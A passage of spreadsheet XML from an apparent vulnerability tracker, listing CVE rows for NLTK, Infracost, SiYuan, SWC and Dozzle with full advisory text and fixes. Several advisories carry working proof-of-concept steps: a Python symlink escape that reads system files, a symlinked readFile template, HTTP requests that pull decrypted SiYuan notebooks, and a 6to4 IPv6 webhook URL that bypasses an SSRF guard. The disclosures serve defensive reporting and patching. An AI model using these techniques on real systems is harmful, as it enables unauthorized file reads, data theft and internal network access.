t="inlineStr" /><c r="S1580" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1580" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70613</t></is></c></row><row r="1581"><c r="A1581" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1581" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1581" s="5" t="inlineStr"><is><t>CVE-2026-70614</t></is></c><c r="D1581" s="5" t="inlineStr" /><c r="E1581" s="5" t="inlineStr" /><c r="F1581" s="5" t="inlineStr" /><c r="G1581" s="5" t="inlineStr" /><c r="H1581" s="5" t="inlineStr" /><c r="I1581" s="5" t="inlineStr" /><c r="J1581" s="5" t="inlineStr" /><c r="K1581" s="5" t="inlineStr" /><c r="L1581" s="5" t="inlineStr" /><c r="M1581" s="5" t="inlineStr" /><c r="N1581" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1581" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1581" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1581" s="5" t="inlineStr" /><c r="R1581" s="5" t="inlineStr" /><c r="S1581" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1581" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70614</t></is></c></row><row r="1582"><c r="A1582" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1582" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1582" s="5" t="inlineStr"><is><t>CVE-2026-70626</t></is></c><c r="D1582" s="5" t="inlineStr" /><c r="E1582" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1582" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1582" s="5" t="inlineStr" /><c r="H1582" s="5" t="n"><v>0.002</v></c><c r="I1582" s="5" t="inlineStr" /><c r="J1582" s="5" t="inlineStr" /><c r="K1582" s="5" t="inlineStr" /><c r="L1582" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1582" s="5" t="inlineStr"><is><t>3.9.4</t></is></c><c r="N1582" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1582" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1582" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1582" s="5" t="inlineStr" /><c r="R1582" s="5" t="inlineStr" /><c r="S1582" s="5" t="inlineStr"><is><t>### Summary
`nltk.corpus.reader.api.CorpusReader.open()` can be used to read files outside the intended corpus root via a symlink placed inside that root. Although NLTK blocks absolute paths and `..` traversal, the current boundary check is only lexical and does not account for symlink resolution. This leads to an arbitrary local file read / filesystem sandbox bypass for applications that rely on `CorpusReader` or `FileSystemPathPointer` to restrict file access.

### Details
The vulnerable flow is:

- [`nltk/corpus/reader/api.py:222`](/mnt/Data/my_brains/test/nltk/nltk/corpus/reader/api.py#L222)
  - `CorpusReader.open()` blocks absolute paths and `..`, then calls `self._root.join(file).open()`

- [`nltk/data.py:398`](/mnt/Data/my_brains/test/nltk/nltk/data.py#L398)
  - `FileSystemPathPointer.join()` joins the requested file ID and checks whether the resulting path still appears to remain under the configured root

The problem is that the check is based on the lexical path after `os.path.normpath()`, not on the resolved path after following symlinks.

Current behavior:

1. `CorpusReader.open()` rejects:
   - absolute paths
   - `..` path traversal
2. `FileSystemPathPointer.join()` computes:
   - `joined = os.path.normpath(os.path.join(self._path, fileid))`
   - `root = os.path.normpath(self._path)`
3. It allows the access if `joined` starts with `root`

This misses the case where a path stays inside the root lexically, but resolves outside the root via a symlink already present under the allowed directory.

Example:

```text
JOINED=/tmp/nltk-root/link/secret.txt
REALPATH=/tmp/outside/secret.txt
```

`JOINED` still appears to be inside the root, but `REALPATH` is outside it.

This is distinct from simple `../` traversal:

- the file ID is not absolute
- the file ID does not contain `..`
- the escape only happens after filesystem resolution of a symlink under the allowed root

### PoC
Reproduced in an isolated Docker sandbox using the local `nltk` clone.

Minimal Python PoC:

```python
import os
import tempfile
from nltk.corpus.reader.api import CorpusReader

root = tempfile.mkdtemp(prefix="nltk-root-")
outside_dir = tempfile.mkdtemp(prefix="nltk-out-")
outside_file = os.path.join(outside_dir, "secret.txt")

with open(outside_file, "w") as f:
    f.write("secret-data")

os.symlink(outside_dir, os.path.join(root, "link"))

corpus = CorpusReader(root, ["link/secret.txt"])
with corpus.open("link/secret.txt") as f:
    print(f.read())
```

Observed result:

```text
secret-data
```

Docker re-test output:

```text
ROOT=/tmp/nltk-root-jjxay3if
OUTSIDE_DIR=/tmp/nltk-out-1kef36e0
JOINED=/tmp/nltk-root-jjxay3if/link/secret.txt
REALPATH=/tmp/nltk-out-1kef36e0/secret.txt
READ_OK=secret-data
INSIDE_ROOT=True
REAL_INSIDE_ROOT=False
```

Additional impact validation using a system file:

```text
ROOT=/tmp/nltk-root-_h5x4m19
JOINED=/tmp/nltk-root-_h5x4m19/hostfile
REALPATH=/etc/hostname
HOSTNAME_READ=48dafb244af3
INSIDE_ROOT=True
REAL_INSIDE_ROOT=False
```

This shows that the issue is not limited to attacker-created files outside the root; it can also read existing system files that are readable by the application user.

### Impact
This is an arbitrary local file read / symlink escape issue.

Who is impacted:

- applications that accept attacker-controlled corpus directories, extracted datasets, or package contents
- applications that rely on NLTK corpus readers as a trust boundary for file access
- any deployment where an attacker can place or influence files inside the allowed corpus root

Practical impact includes disclosure of:

- application secrets stored on disk
- local configuration files
- private datasets
- process-exposed files such as `/proc/self/environ`
- system files readable by the running user

The issue is best described as a filesystem sandbox bypass caused by improper link resolution before file access.</t></is></c><c r="T1582" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70626</t></is></c></row><row r="1583"><c r="A1583" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1583" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1583" s="5" t="inlineStr"><is><t>CVE-2026-71493</t></is></c><c r="D1583" s="5" t="inlineStr" /><c r="E1583" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1583" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1583" s="5" t="inlineStr" /><c r="H1583" s="5" t="n"><v>0.004</v></c><c r="I1583" s="5" t="inlineStr" /><c r="J1583" s="5" t="inlineStr" /><c r="K1583" s="5" t="inlineStr" /><c r="L1583" s="5" t="inlineStr"><is><t>Go:github.com/infracost/infracost</t></is></c><c r="M1583" s="5" t="inlineStr"><is><t>0.10.45</t></is></c><c r="N1583" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1583" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1583" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1583" s="5" t="inlineStr" /><c r="R1583" s="5" t="inlineStr" /><c r="S1583" s="5" t="inlineStr"><is><t>### Impact

Path traversal via link following in the Infracost config-template parser. The `readFile`, `pathExists`, `isDir`, and `matchPaths` template functions confined repo-supplied paths with a lexical `filepath.Rel` check plus a leaf-only `os.Lstat`:

```
{{ readFile "evil/file" }}
```

With an intermediate directory symlink committed in the repo (`evil -&gt; /`), the path is lexically clean and the leaf is a regular file, so both checks pass, but `os.ReadFile` follows the symlink and reads outside the checkout. The contents are rendered into the generated config and surfaced via the Infracost dashboard and PR comment, so anyone who can open a pull request can read files off the runner.

Affects `infracost` up to and including `v0.10.44`. Successful exploitation reads any file the CLI process can reach on the runner. Impact depends on what the run exposes: under `on: pull_request` (the configuration in Infracost's documentation) fork pull requests run without secrets and with a read-only token, so exposure is limited. If Infracost runs under `pull_request_target`, or is triggered by a same-repository pull request, the read reaches the repository's secrets, enabling secret theft. The patch confines all four functions regardless of trigger.

### Patches

Fixed in `v0.10.45` ([#3586](https://github.com/infracost/infracost/pull/3586)) by routing all four functions through `security.IsPathAllowed`, which resolves symlinks anywhere in the path before a segment-aware containment check. The same fix landed in [config#14](https://github.com/infracost/config/pull/14) and [parser#144](https://github.com/infracost/parser/pull/144).
  - Installed via the official script, a package manager, or the `latest` Docker tag: upgrade to `v0.10.45` (or later) to receive the fix.
  - Pinned to a specific version or image digest: bump to `v0.10.45`.

### Workarounds

No full fix without upgrading. To limit exposure: run Infracost under `on: pull_request` rather than `pull_request_target`, and keep fork pull requests from receiving secrets (the defaults).</t></is></c><c r="T1583" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71493</t></is></c></row><row r="1584"><c r="A1584" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1584" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1584" s="5" t="inlineStr"><is><t>CVE-2026-71494</t></is></c><c r="D1584" s="5" t="inlineStr" /><c r="E1584" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1584" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1584" s="5" t="inlineStr" /><c r="H1584" s="5" t="n"><v>0.004</v></c><c r="I1584" s="5" t="inlineStr" /><c r="J1584" s="5" t="inlineStr" /><c r="K1584" s="5" t="inlineStr" /><c r="L1584" s="5" t="inlineStr"><is><t>Go:github.com/infracost/infracost</t></is></c><c r="M1584" s="5" t="inlineStr"><is><t>0.10.45</t></is></c><c r="N1584" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1584" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1584" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1584" s="5" t="inlineStr" /><c r="R1584" s="5" t="inlineStr" /><c r="S1584" s="5" t="inlineStr"><is><t>### Impact

Sensitive information exposure in the Infracost Terraform Cloud/Enterprise integration. Several code paths attached a configured secret token to a request whose host was taken straight from the scanned Terraform, with no check that the host was the trusted endpoint. 

The condition that matters is whether a Terraform Cloud/Enterprise (or registry) token is present in the run: if one is, the injected hostname can disclose it. Impact therefore depends on the trigger. Under `on: pull_request` (the only configuration in Infracost's documentation) fork pull requests run without secrets, so no token is present. It only reaches token disclosure under `pull_request_target`, a same-repository pull request, or another CI setup that provides the token alongside untrusted Terraform, and exploiting an untrusted fork pull request also typically needs a maintainer to approve the workflow run. The patch scopes the token to the trusted host regardless of trigger.

### Patches

Fixed in `v0.10.45` ([#3590](https://github.com/infracost/infracost/pull/3590)) by attaching a token only when the destination host matches the configured trusted host; otherwise Infracost refuses to send it and skips remote variable loading
  - Installed via the official script, a package manager, or the `latest` Docker tag: upgrade to `v0.10.45` (or later) to receive the fix.
  - Pinned to a specific version or image digest: bump to `v0.10.45`.

### Workarounds

No full fix without upgrading. To limit exposure: use `on: pull_request` rather than `pull_request_target`, pin `organization`, `workspace`, and `host` in Infracost config so the `.tf` hostname is ignored, and keep Terraform Cloud and registry tokens out of runs that process untrusted pull request content.</t></is></c><c r="T1584" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71494</t></is></c></row><row r="1585"><c r="A1585" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1585" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1585" s="5" t="inlineStr"><is><t>CVE-2026-72789</t></is></c><c r="D1585" s="5" t="inlineStr" /><c r="E1585" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1585" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1585" s="5" t="inlineStr" /><c r="H1585" s="5" t="n"><v>0.003</v></c><c r="I1585" s="5" t="inlineStr" /><c r="J1585" s="5" t="inlineStr" /><c r="K1585" s="5" t="inlineStr" /><c r="L1585" s="5" t="inlineStr"><is><t>Go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M1585" s="5" t="inlineStr"><is><t>0.0.0-20260726020813-a25c2dd06aae</t></is></c><c r="N1585" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1585" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1585" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1585" s="5" t="inlineStr" /><c r="R1585" s="5" t="inlineStr" /><c r="S1585" s="5" t="inlineStr"><is><t>**CVE:** This vulnerability corresponds to [CVE-2026-72789](https://nvd.nist.gov/vuln/detail/CVE-2026-72789).

### Summary

`publishAccess.json` is an opt-out list. The publish gate returns *accessible* for anything not explicitly listed in it. Encrypted notebooks are never written into that file, because only the administrator-gated `setPublishAccess` writes it and no part of the encryption subsystem does. Consequently every encrypted notebook is publish-accessible as far as the gate is concerned.

While an encrypted notebook is unlocked, an anonymous reader in publish mode can list it, enumerate its documents, and retrieve their fully decrypted content. No key material, no password, and no cracking is involved. The kernel decrypts the data and serves it because the authorization layer never asks whether the notebook is encrypted.

This is reported as a defect in the gate rather than in any individual handler. Endpoints that were previously reviewed and found to apply the correct checks do apply them. The checks return true.

### Details

**The gate defaults to accessible.** `CheckPathAccessableByPublishIgnore(box, path, ignore)` iterates the ignore list and returns false only on a match:

```go
for _, item := range publishIgnore {
    if item.ID == box || strings.Contains(path, item.ID) {
        return false
    }
}
return true   // unlisted means accessible
```

**Encrypted notebooks are never listed.** `publishAccess.json` is written only by `setPublishAccess` (`kernel/api/router.go:169`), which carries `CheckAdminRole` and `CheckReadonly`. Nothing in `crypto.go`, `encrypted_ops.go` or `notebook_crypto.go` writes to it. An administrator would have to manually add each encrypted notebook to the ignore list to protect it, and nothing in the product prompts or documents that.

**Neither core gate rejects them.** On both `eef105683` and `v3.7.4-alpha.1`:

```go
func checkBlockTreeAccessableByPublishAccess(...) bool {
    return CheckPathAccessableByPublishIgnore(bt.BoxID, bt.Path, publishIgnore) &amp;&amp;
           (password == "" || CheckPublishAuthCookie(c, passwordID, password))
}
```

For an encrypted notebook the first term is true because it is unlisted, and the second is true because encrypted notebooks carry no publish password. The conjunction returns true.

`IsEncryptedBox` does not appear in `kernel/model/publish_access.go` at all on master. On the development branch it appears once, inside `parseAttributeViewForPublishAccess`, where it routes *into* encrypted boxes rather than excluding them. The publish authorization layer has no concept of an encrypted notebook.

**The chain.** Verified on the development branch, which is the harder target because the block-metadata, attribute-view, path-resolution and encrypted-notebook-status fixes have all landed there.

1. `lsNotebooks` calls `ListNotebooks()`, which includes encrypted notebooks and reports `Encrypted: boxConf.Encrypted` without filtering on it. The reader filter skips only notebooks that are `Closed` or publish-invisible. An unlocked encrypted notebook is neither, so it is returned to an anonymous reader together with its identifier.
2. `listDocsByPath{notebook: &lt;encrypted box id&gt;, path: "/"}` applies only `CheckPathAccessableByPublishIgnore`, which passes, returning the document identifiers and titles inside the encrypted notebook.
3. `getDoc` routes to `GetDocInBox(...)`, after which `FilterContentByPublishAccess(...)` returns the content unmodified because the box is unlisted. The response is the fully decrypted document. `getBlockKramdown` reaches `GetBlockKramdownInBox` for the same result in Markdown.

Handlers reach the decrypted store through `encryptedNotebookFromArg(arg)` on a client-supplied notebook argument. This function predates the current release and is not a recent addition.

**The precondition is the unlock window.** `GetBlockTreeInBox` returns nil while a notebook is locked, treating it as nonexistent, and non-nil once unlocked. So the exposure is bounded to the period during which the legitimate user has the notebook open, which is precisely the period in which they are working in it. No action by the attacker triggers or extends that window, but no unusual condition is required either.

**On endpoints previously assessed as correctly gated.** `getBlockDOM` and `getBlockKramdown` apply password and visibility checks. `exportPreview` applies `FilterContentByPublishAccess`. Those assessments are accurate and this report does not contradict them. The checks execute and return true, because the visibility term resolves to accessible for an unlisted box and the password term is vacuous for a notebook that has no publish password. Patching any individual handler would not change that result.

### Proof of Concept

Precondition: publish mode enabled (default port 6808), anonymous when `Publish.Auth.Enable` is `false`, otherwise any publish reader account. An encrypted notebook that is currently unlocked by the legitimate user.

Step 1, obtain the encrypted notebook's identifier:

```
POST http://127.0.0.1:6808/api/notebook/lsNotebooks
{}

→ 200. The list includes the encrypted notebook, with encrypted: true and its id.
```

Step 2, enumerate its documents:

```
POST http://127.0.0.1:6808/api/filetree/listDocsByPath
{"notebook":"&lt;encrypted box id&gt;","path":"/"}

→ 200, document identifiers and titles from inside the encrypted notebook
```

Step 3, retrieve decrypted content:

```
POST http://127.0.0.1:6808/api/filetree/getDoc
{"id":"&lt;document id from step 2&gt;"}

→ 200, the fully decrypted document
```

`getBlockKramdown` returns the same content as decrypted Markdown. Repeating step 3 while the notebook is locked returns not-found, which confirms the unlock window is the only thing standing between an anonymous reader and the plaintext.

### Impact

The confidentiality guarantee of the encrypted-notebook feature is defeated against a remote, unauthenticated attacker for as long as the notebook is unlocked. A user who encrypts a notebook is expressing that its contents should be protected beyond the ordinary publish boundary. The publish gate does not recognise that intent, and instead treats the notebook as publicly readable because nobody added it to an opt-out list that the encryption feature does not write to.

The exposure is full document content rather than metadata, and it applies to every document in the notebook. It requires no key material, no password, no offline work and no interaction with the encryption subsystem at all.

### Suggested fix

Fail closed on encryption, independently of `publishAccess.json`:

```go
if IsEncryptedBox(bt.BoxID) {
    return false
}
```

in both `checkBlockTreeAccessableByPublishAccess` and `CheckBlockTreeMetadataAccessableByPublishAccess`, and exclude encrypted notebooks from `lsNotebooks` and `listDocsByPath` for read-only roles.

The broader point is the default. An opt-out authorization list means every future notebook type, storage backend or content class is publicly accessible until somebody remembers to add it. Encrypted notebooks are the case where that default is most clearly wrong, but they are unlikely to be the only one.</t></is></c><c r="T1585" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72789</t></is></c></row><row r="1586"><c r="A1586" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1586" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1586" s="5" t="inlineStr"><is><t>CVE-2026-72790</t></is></c><c r="D1586" s="5" t="inlineStr" /><c r="E1586" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1586" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1586" s="5" t="inlineStr" /><c r="H1586" s="5" t="n"><v>0.002</v></c><c r="I1586" s="5" t="inlineStr" /><c r="J1586" s="5" t="inlineStr" /><c r="K1586" s="5" t="inlineStr" /><c r="L1586" s="5" t="inlineStr"><is><t>Go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M1586" s="5" t="inlineStr"><is><t>0.0.0-20260726005141-9edb321eb451</t></is></c><c r="N1586" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1586" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1586" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1586" s="5" t="inlineStr" /><c r="R1586" s="5" t="inlineStr" /><c r="S1586" s="5" t="inlineStr"><is><t>**CVE:** This vulnerability corresponds to [CVE-2026-72790](https://nvd.nist.gov/vuln/detail/CVE-2026-72790).

### Relationship to GHSA-8x84-r2ff-h8pq (please read first)

`getNotebookInfo` is named in the earlier advisory GHSA-8x84-r2ff-h8pq, in its remediation section, which asked for reader filtering on both `getNotebookConf` and `getNotebookInfo`. Commit `3bc014c7d` applied that filtering to `getNotebookConf` only.

That advisory grouped `getNotebookInfo` under `BoxCrypt`, and `getNotebookInfo` never returns `BoxCrypt`. Anyone checking the handler for key material would correctly find none and move on. This report corrects that characterisation and states what the handler actually discloses, which is notebook metadata rather than key material. If you would prefer this tracked as a follow-up on the original advisory rather than separately, that is entirely reasonable.

### Summary

`/api/notebook/getNotebookInfo` is registered with `CheckAuth` only and applies no authorization check of any kind. Given a notebook identifier, it returns that notebook's author-written name, document count, total size and creation and modification timestamps. It does so for every notebook the server has loaded, including notebooks that `lsNotebooks` deliberately withholds from readers because they are closed or not publish-visible.

### Details

| Item | Detail |
|---|---|
| Route | `kernel/api/router.go:123` `POST /api/notebook/getNotebookInfo` → `model.CheckAuth` → `getNotebookInfo` |
| Middleware | `CheckAuth` only, no `CheckReadonly`, no `CheckAdminRole` |
| Guard in handler | None. `IsReadOnlyRoleContext`, `publishAccess`, `Visible` and `Closed` all return zero matches |
| Exposed | `BoxInfo{ID, Name, DocCount, Size, HSize, Mtime, CTime, HMtime, HCtime}` |
| Affected refs | `eef105683` (v3.7.3, master HEAD) and `v3.7.4-alpha.1`, handler identical on both |

**The handler.** It validates `boxID` against the ID pattern, calls `box := model.Conf.Box(boxID)`, returns a not-found response if that is nil, and otherwise returns `box.GetInfo()` unmodified. `GetInfo()` (`kernel/model/box.go:470`) walks the notebook's files and returns the metadata listed above. There is no ownership check and no publish-access check anywhere on the path.

The nil branch is also a minor existence oracle: a valid-format identifier that names no loaded notebook is distinguishable from one that does.

**Guarded sibling.** `lsNotebooks`, the notebook lister, is also reader-reachable and does filter. For read-only roles it skips any notebook where `notebook.Closed` holds, and skips any notebook whose publish-access entry has `!item.Visible`. The codebase therefore intends closed and non-published notebooks to be invisible to readers. `getNotebookInfo` returns their name and statistics to any reader who supplies the identifier.

**Precedent.** GHSA-f2rw-w22v-54vh restricted `getEncryptedNotebookStatus`, which disclosed encrypted-notebook names and lock state, to administrators. `getNotebookInfo` is the non-encrypted analogue, disclosing regular notebook names and statistics including for notebooks outside the reader's publish scope, and was not restricted.

**Reachability, stated precisely, because it differs by branch.**

On v3.7.3 a reader can obtain the identifier of a notebook they cannot see, by chaining two endpoints that are currently ungated on that branch. `getBlockDefIDsByRefText` returns block and document identifiers workspace-wide, including from hidden notebooks. `getPathByID` then returns the owning notebook identifier for any such block, in its `notebook` field. `getFullHPathByID` additionally discloses the notebook name directly. The chain requires no special conditions beyond a reference text that occurs somewhere in the workspace.

On the development branch those sources are already closed. `getPathByID` now gates through `CheckBlockIdMetadataAccessableByPublishAccessInBox`, `getIDsByHPath` through `filterFileTreeBlockIDsByPublishDiscoverability`, and `getBlockDefIDsByRefText` and `getFullHPathByID` are likewise gated. Notebook identifiers are a fourteen-digit timestamp plus seven random characters, and `Conf.Box(boxID)` returns non-nil only for loaded notebooks, so guessing is not practical. A reader-reachable route on the development branch that yields the identifier of a hidden notebook was not found.

So on the development branch this is defence in depth rather than a live path. It is reported because the handler itself remains unguarded on both branches, and because closing it removes any dependence on those identifier sources staying gated in future.

### Proof of Concept

Precondition: publish mode enabled (default port 6808), anonymous when `Publish.Auth.Enable` is `false`, otherwise any publish reader account. A notebook that is closed or not publish-visible. Steps 1 and 2 apply to v3.7.3; on the development branch, start at step 3 with a known identifier.

Step 1, obtain block identifiers workspace-wide:

```
POST http://127.0.0.1:6808/api/block/getBlockDefIDsByRefText
{"anchor":"&lt;a word likely to occur anywhere in the workspace&gt;"}

→ 200, block and document identifiers including ones inside hidden notebooks
```

Step 2, resolve one to its owning notebook:

```
POST http://127.0.0.1:6808/api/filetree/getPathByID
{"id":"&lt;identifier from step 1&gt;"}

→ 200, the notebook field carries the hidden notebook's boxID
```

Step 3, read the notebook's metadata:

```
POST http://127.0.0.1:6808/api/notebook/getNotebookInfo
{"notebook":"&lt;boxID from step 2&gt;"}

→ 200, returns name, docCount, size, hSize, mtime, ctime, hMtime, hCtime
   for a notebook that lsNotebooks does not return to this same session
```

The differential is the point: call `lsNotebooks` with the same session and confirm the notebook is absent from the list, then call `getNotebookInfo` and receive its name and statistics.

### Impact

An anonymous reader in publish mode, or any publish `RoleReader`, can read the author-written name, document count, total size and activity timestamps of notebooks that are closed or not published, which are exactly the notebooks the notebook lister withholds from them. Notebook names are free text chosen by the author and routinely describe their contents. Document count and size indicate scale, and the modification timestamp reveals recent activity in a workspace area the reader has no access to. Confidentiality only, with no integrity or availability impact, and no document content is disclosed.

### Suggested fix

Apply the same filtering `lsNotebooks` already performs. When `IsReadOnlyRoleContext(c)` holds, return the not-found response unless the notebook is publish-visible and not closed, before calling `GetInfo()`. This is the reader filtering the earlier advisory's remediation section requested for this handler.</t></is></c><c r="T1586" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72790</t></is></c></row><row r="1587"><c r="A1587" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1587" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1587" s="5" t="inlineStr"><is><t>CVE-2026-72925</t></is></c><c r="D1587" s="5" t="inlineStr" /><c r="E1587" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1587" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1587" s="5" t="inlineStr" /><c r="H1587" s="5" t="n"><v>0.002</v></c><c r="I1587" s="5" t="inlineStr" /><c r="J1587" s="5" t="inlineStr" /><c r="K1587" s="5" t="inlineStr" /><c r="L1587" s="5" t="inlineStr"><is><t>crates.io:swc_html_minifier, npm:@swc/html</t></is></c><c r="M1587" s="5" t="inlineStr"><is><t>1.15.47-nightly-20260729.1, 59.0.0</t></is></c><c r="N1587" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1587" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1587" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1587" s="5" t="inlineStr" /><c r="R1587" s="5" t="inlineStr" /><c r="S1587" s="5" t="inlineStr"><is><t>## Impact

`@swc/html` minifies JSON contained in `script` elements such as
`application/json` and `application/ld+json` by parsing and serializing the
JSON value.

Before the patched versions, JSON serialization could convert escaped
less-than signs such as `\u003C` into literal `&lt;` characters. If the JSON
contained an escaped `&lt;/script&gt;` sequence, the generated HTML could terminate
the containing script element early because HTML tokenization occurs before
the JSON is consumed.

Applications that minify HTML containing attacker-controlled JSON data could
therefore transform inert data into active markup. A crafted payload could
execute script in the origin of the generated page.

## Patches

The issue is fixed in:

- `@swc/html` 1.15.47
- `swc_html_minifier` 59.0.0

The minifier now re-escapes less-than signs after JSON serialization, preserving
the script element boundary.

## Workarounds

Users who cannot upgrade can disable JSON minification with:

```js
await minify(html, {
  minifyJson: false,
});</t></is></c><c r="T1587" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72925</t></is></c></row><row r="1588"><c r="A1588" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1588" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1588" s="5" t="inlineStr"><is><t>CVE-2026-73087</t></is></c><c r="D1588" s="5" t="inlineStr" /><c r="E1588" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1588" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1588" s="5" t="inlineStr" /><c r="H1588" s="5" t="n"><v>0.003</v></c><c r="I1588" s="5" t="inlineStr" /><c r="J1588" s="5" t="inlineStr" /><c r="K1588" s="5" t="inlineStr" /><c r="L1588" s="5" t="inlineStr"><is><t>Go:github.com/amir20/dozzle</t></is></c><c r="M1588" s="5" t="inlineStr"><is><t>1.29.1-0.20260804193351-8cf7ccd5ee04</t></is></c><c r="N1588" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1588" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1588" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1588" s="5" t="inlineStr" /><c r="R1588" s="5" t="inlineStr" /><c r="S1588" s="5" t="inlineStr"><is><t>## Summary

The `isBlockedIP` SSRF guard in Dozzle's webhook notification dispatcher blocks loopback, link-local, multicast, and unspecified addresses but does not recognize IPv6 transition mechanism addresses (RFC 3056 6to4, RFC 6052 NAT64, RFC 4380 Teredo) that embed arbitrary IPv4 addresses. An authenticated user can bypass the guard to reach loopback services, cloud metadata endpoints (169.254.169.254), and other blocked ranges via webhook notification URLs.

## Affected component / versions

- Package: `github.com/amir20/dozzle`
- Affected versions: all versions with SSRF guard (current HEAD [`b9df313`](https://github.com/amir20/dozzle/commit/b9df31356fc024e6768a1aac605844dc041d95ee))
- Vulnerable code: `internal/notification/dispatcher/webhook.go`

## Details

### Root cause (CWE-918)

[`internal/notification/dispatcher/webhook.go:32-51`](https://github.com/amir20/dozzle/blob/b9df31356fc024e6768a1aac605844dc041d95ee/internal/notification/dispatcher/webhook.go#L32-L51):

```go
func isBlockedIP(ip net.IP) bool {
	if ip.IsLoopback() ||
		ip.IsLinkLocalUnicast() ||
		ip.IsLinkLocalMulticast() ||
		ip.IsMulticast() ||
		ip.IsInterfaceLocalMulticast() ||
		ip.IsUnspecified() {
		return true
	}
	if v4 := ip.To4(); v4 != nil &amp;&amp; zeroNetV4.Contains(v4) {
		return true
	}
	if ip.Equal(net.IPv4bcast) {
		return true
	}
	return false
}
```

The guard intentionally allows RFC 1918 private ranges for self-hosted webhook targets, but blocks loopback (127.0.0.0/8, ::1), link-local (169.254.0.0/16, fe80::/10), and other non-routable addresses. IPv6 transition mechanism addresses bypass all these checks:

| Mechanism | Prefix | Embeds | `isBlockedIP` result |
|-----------|--------|--------|---------------------|
| 6to4 | `2002::/16` | any IPv4 in bits 16-47 | `false` |
| NAT64 WKP | `64:ff9b::/96` | any IPv4 in bits 96-127 | `false` |
| Teredo | `2001:0000::/32` | any IPv4 in bits 96-127 | `false` |

### Reachability / trust boundary

The `safeDialContext` function (line 53) resolves hostnames and checks each IP against `isBlockedIP` before establishing a TCP connection. This is used as the `DialContext` for the webhook HTTP client (line 115).

Webhook URLs are configured by authenticated Dozzle users through the notification settings UI. The guard exists to prevent authenticated users from using webhook delivery as a proxy to reach the host machine's loopback services or cloud metadata endpoint.

### Attack chain

1. Authenticated user creates a webhook notification with URL `http://[2002:7f00:0001::1]:8080/` (6to4 embedding 127.0.0.1)
2. When a notification triggers, Dozzle's webhook dispatcher calls `safeDialContext`
3. The IPv6 address `2002:7f00:0001::1` is checked against `isBlockedIP` -- all predicates return false
4. Connection proceeds to the 6to4 relay which routes to 127.0.0.1
5. The webhook POST reaches the host's loopback services

## Impact

An authenticated user can bypass the SSRF guard to:

